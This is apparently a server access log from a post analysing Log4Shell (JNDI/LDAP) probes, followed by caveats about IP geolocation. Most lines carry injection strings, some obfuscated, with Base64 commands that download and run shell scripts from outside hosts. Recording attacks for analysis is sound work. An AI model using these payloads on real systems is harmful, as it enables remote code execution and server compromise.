68.183.54.220 - - [16/Jan/2022:21:32:16 +0000] "GET /:80:undefined HTTP/1.1" 302 218 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191.232.194.71:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191.232.194.71:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')"
107.77.224.5 - - [17/Jan/2022:18:14:58 +0000] "GET /?nvfxu=${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.5 - - [17/Jan/2022:18:14:58 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a}"
107.77.76.17 - - [17/Jan/2022:18:20:09 +0000] "GET /?muuxq=${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.17 - - [17/Jan/2022:18:20:09 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a}"
107.77.226.152 - - [18/Jan/2022:17:12:12 +0000] "GET /?qdokq=${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.152 - - [18/Jan/2022:17:12:12 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a}"
107.77.106.81 - - [18/Jan/2022:17:18:26 +0000] "GET /?eneru=${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.81 - - [18/Jan/2022:17:18:27 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a}"
107.77.226.118 - - [19/Jan/2022:17:43:29 +0000] "GET /?finwj=${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.118 - - [19/Jan/2022:17:43:29 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a}"
107.77.106.132 - - [19/Jan/2022:17:49:30 +0000] "GET /?ubgvg=${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.132 - - [19/Jan/2022:17:49:31 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a}"
209.141.47.28 - - [20/Jan/2022:14:07:40 +0000] "GET /$%7Bjndi:ldap://192.3.194.202:8080/o=tomcat%7D HTTP/1.1" 400 347 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64)${jndi:ldap://192.3.194.202:8080/o=tomcat}"
107.77.226.14 - - [20/Jan/2022:17:14:46 +0000] "GET /?oatmh=${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.14 - - [20/Jan/2022:17:14:47 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a}"
107.77.106.35 - - [20/Jan/2022:17:23:17 +0000] "GET /?dthxd=${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.35 - - [20/Jan/2022:17:23:17 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a}"
107.77.226.231 - - [21/Jan/2022:17:21:40 +0000] "GET /?ehjga=${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.231 - - [21/Jan/2022:17:21:41 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a}"
107.77.106.122 - - [21/Jan/2022:17:27:27 +0000] "GET /?ppoyn=${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.122 - - [21/Jan/2022:17:27:27 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a}"
159.223.171.171 - - [21/Jan/2022:21:22:34 +0000] "GET /:undefined HTTP/1.1" 302 215 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13.78.223.142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13.78.223.142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')"
107.77.224.99 - - [22/Jan/2022:19:46:37 +0000] "GET /?wnrtd=${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.99 - - [22/Jan/2022:19:46:37 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a}"
107.77.76.94 - - [22/Jan/2022:19:52:08 +0000] "GET /?abbbr=${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.94 - - [22/Jan/2022:19:52:08 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a}"
34.74.41.34 - - [23/Jan/2022:17:31:14 +0000] "GET /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27)&wt=json HTTP/1.1" 302 685 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')"
34.74.41.34 - - [23/Jan/2022:17:31:58 +0000] "GET /solr/admin/collections?action=t(%2527$%257B$%257Benv:BARFOO:-j%257Dndi$%257Benv:BARFOO:-:%257D$%257Benv:BARFOO:-l%257Ddap$%257Benv:BARFOO:-:%257D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%257D%2527)&wt=json HTTP/1.1" 404 220 "http://50.116.41.48/solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27)&wt=json" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')"
107.77.226.9 - - [24/Jan/2022:17:08:18 +0000] "GET /?igqvd=${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.9 - - [24/Jan/2022:17:08:18 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a}"
107.77.106.25 - - [24/Jan/2022:17:14:14 +0000] "GET /?tqroo=${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.25 - - [24/Jan/2022:17:14:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a}"
98.0.242.10 - - [26/Jan/2022:16:58:13 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.12.32.14:1389/a}"
98.0.242.10 - - [26/Jan/2022:16:58:13 +0000] "GET / HTTP/1.1" 200 5960 "-" "${jndi:ldap://45.12.32.14:1389/a}"
98.0.242.10 - - [27/Jan/2022:14:53:19 +0000] "GET / HTTP/1.1" 200 96 "${jndi:ldap://45.139.100.173:1389/a}" "${jndi:ldap://45.139.100.173:1389/a}"
Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):
Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.
For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.
httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]
## Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1 404 RU
Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and distort the resulting aggregate data.
It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.
Because most of these agreements are made in private, and due to the fact that most geolocation, RDAP, and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.
This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that any false geolocation is being performed by these packages, however.
Also used is the self-reported RDAP or WHOIS systems which can frequently be self-reported falsely or misleadingly. Which of the systems (RDAP, WHOIS, or rgeolocate) used are disclosed when necessary.
Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.